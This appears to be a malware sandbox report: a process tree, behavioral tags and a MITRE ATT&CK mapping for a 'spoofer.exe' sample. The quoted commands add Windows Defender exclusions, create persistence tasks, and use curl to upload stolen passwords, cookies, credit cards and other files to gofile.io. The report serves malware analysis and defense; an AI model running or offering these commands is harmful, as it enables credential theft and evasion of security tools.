  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
  2⤵
  PID:1272
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4644 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
  2⤵
  PID:4132
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6020 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
  2⤵
  PID:3984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5656 /prefetch:1
  2⤵
  PID:3532
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6604 /prefetch:1
  2⤵
  PID:2472
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6632 /prefetch:1
  2⤵
  PID:3448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
  2⤵
  PID:732
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6788 /prefetch:1
  2⤵
  PID:692
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5532 /prefetch:8
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6572 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:2892
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:1
  2⤵
  PID:1668
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
  2⤵
  PID:5040
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6812 /prefetch:1
  2⤵
  PID:2052
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6668 /prefetch:1
  2⤵
  PID:4680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:1
  2⤵
  PID:5088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6208 /prefetch:1
  2⤵
  PID:2196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6160 /prefetch:1
  2⤵
  PID:2600
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  PID:2392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6768 /prefetch:1
  2⤵
  PID:5208
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1936,1844736293065725733,4618322994402400412,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2496 /prefetch:2
  2⤵
  PID:2864

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1428

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5064

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2012

C:\Users\Admin\Downloads\7z2407-x64.exe
"C:\Users\Admin\Downloads\7z2407-x64.exe"
1⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5712

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Debug\" -spe -an -ai#7zMap28401:72:7zEvent28939
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:2660

C:\Users\Admin\Downloads\Debug\spoofer.exe
"C:\Users\Admin\Downloads\Debug\spoofer.exe"
1⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Maps connected drives based on registry
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4756
- C:\Windows\Fonts\Update.exe
  "C:\Windows\Fonts\Update.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:2692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1096
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\External_V3'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1480
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'External_V3'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:5944
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "External_V3" /tr "C:\Users\Admin\AppData\Roaming\External_V3"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1472
- C:\Windows\Fonts\Ethone.exe
  "C:\Windows\Fonts\Ethone.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  PID:3336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Fonts\Ethone.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1660
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Ethone.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:4720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Kacper'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:3536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Kacper'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1424
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Kacper" /tr "C:\Users\Admin\AppData\Roaming\Kacper"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:4796
- C:\Windows\Fonts\1.exe
  "C:\Windows\Fonts\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:676
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "OperaGx" /tr '"C:\Users\Admin\AppData\Roaming\OperaGx.exe"' & exit
    3⤵
    PID:3376
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc onlogon /rl highest /tn "OperaGx" /tr '"C:\Users\Admin\AppData\Roaming\OperaGx.exe"'
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:5572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp45F8.tmp.bat""
    3⤵
    PID:5184
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5368
  - - C:\Users\Admin\AppData\Roaming\OperaGx.exe
      "C:\Users\Admin\AppData\Roaming\OperaGx.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:5528
- C:\Windows\Fonts\tak.exe
  "C:\Windows\Fonts\tak.exe"
  2⤵
  - Executes dropped EXE
  PID:2392
- - C:\Windows\Fonts\tak.exe
    "C:\Windows\Fonts\tak.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    PID:5712
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:2668
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:6096
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:1232
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:1876
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:5784
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:4984
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:1448
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:4220
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:5104
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:5112
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile"
      4⤵
      PID:4852
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:5808
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupGet.tiff" https://store10.gofile.io/uploadFile"
      4⤵
      PID:5968
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Desktop/BackupGet.tiff" https://store10.gofile.io/uploadFile
        5⤵
        
        PID:4024
- C:\Windows\Fonts\1.exe
  "C:\Windows\Fonts\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5644
- C:\Windows\Fonts\1.exe
  "C:\Windows\Fonts\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4876
- C:\Windows\Fonts\1.exe
  "C:\Windows\Fonts\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5992
- C:\Windows\Fonts\1.exe
  "C:\Windows\Fonts\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2156
- C:\Windows\Fonts\tak.exe
  "C:\Windows\Fonts\tak.exe"
  2⤵
  - Executes dropped EXE
  PID:5352
- - C:\Windows\Fonts\tak.exe
    "C:\Windows\Fonts\tak.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Loads dropped DLL
    PID:6092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store3.gofile.io/uploadFile"
      4⤵
      PID:2436
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store3.gofile.io/uploadFile
        5⤵
        
        PID:1688
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store3.gofile.io/uploadFile"
      4⤵
      PID:6140
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store3.gofile.io/uploadFile
        5⤵
        
        PID:5424
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store3.gofile.io/uploadFile"
      4⤵
      PID:4720
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store3.gofile.io/uploadFile
        5⤵
        
        PID:5380
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store3.gofile.io/uploadFile"
      4⤵
      PID:4964
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store3.gofile.io/uploadFile
        5⤵
        
        PID:2392
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store3.gofile.io/uploadFile"
      4⤵
      PID:5496
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store3.gofile.io/uploadFile
        5⤵
        
        PID:4092
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store3.gofile.io/uploadFile"
      4⤵
      PID:4576
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store3.gofile.io/uploadFile
        5⤵
        
        PID:5372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin/Desktop/BackupGet.tiff" https://store3.gofile.io/uploadFile"
      4⤵
      PID:2484
    - - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin/Desktop/BackupGet.tiff" https://store3.gofile.io/uploadFile
        5⤵
        
        PID:5840

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004E4 0x00000000000004F0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5432

C:\Users\Admin\AppData\Roaming\External_V3
C:\Users\Admin\AppData\Roaming\External_V3
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5416

C:\Users\Admin\AppData\Roaming\Kacper
C:\Users\Admin\AppData\Roaming\Kacper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Users\Admin\AppData\Roaming\Kacper
C:\Users\Admin\AppData\Roaming\Kacper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2904

C:\Users\Admin\AppData\Roaming\External_V3
C:\Users\Admin\AppData\Roaming\External_V3
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3764

C:\Users\Admin\AppData\Roaming\Kacper
C:\Users\Admin\AppData\Roaming\Kacper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Users\Admin\AppData\Roaming\External_V3
C:\Users\Admin\AppData\Roaming\External_V3
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3216

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:5408

C:\Users\Admin\AppData\Roaming\Kacper
C:\Users\Admin\AppData\Roaming\Kacper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4916

C:\Users\Admin\AppData\Roaming\External_V3
C:\Users\Admin\AppData\Roaming\External_V3
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5940

C:\Windows\system32\notepad.exe
"C:\Windows\system32\notepad.exe"
1⤵
PID:3116

C:\Users\Admin\AppData\Roaming\Kacper
C:\Users\Admin\AppData\Roaming\Kacper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1272

C:\Users\Admin\AppData\Roaming\External_V3
C:\Users\Admin\AppData\Roaming\External_V3
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1576

C:\Users\Admin\AppData\Roaming\Kacper
C:\Users\Admin\AppData\Roaming\Kacper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5160

C:\Users\Admin\AppData\Roaming\External_V3
C:\Users\Admin\AppData\Roaming\External_V3
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3260

C:\Users\Admin\AppData\Roaming\Kacper
C:\Users\Admin\AppData\Roaming\Kacper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3300

C:\Users\Admin\AppData\Roaming\External_V3
C:\Users\Admin\AppData\Roaming\External_V3
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3056

C:\Users\Admin\AppData\Roaming\Kacper
C:\Users\Admin\AppData\Roaming\Kacper
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3304

C:\Users\Admin\AppData\Roaming\External_V3
C:\Users\Admin\AppData\Roaming\External_V3
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Component Object Model Hijacking

T1546.015

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion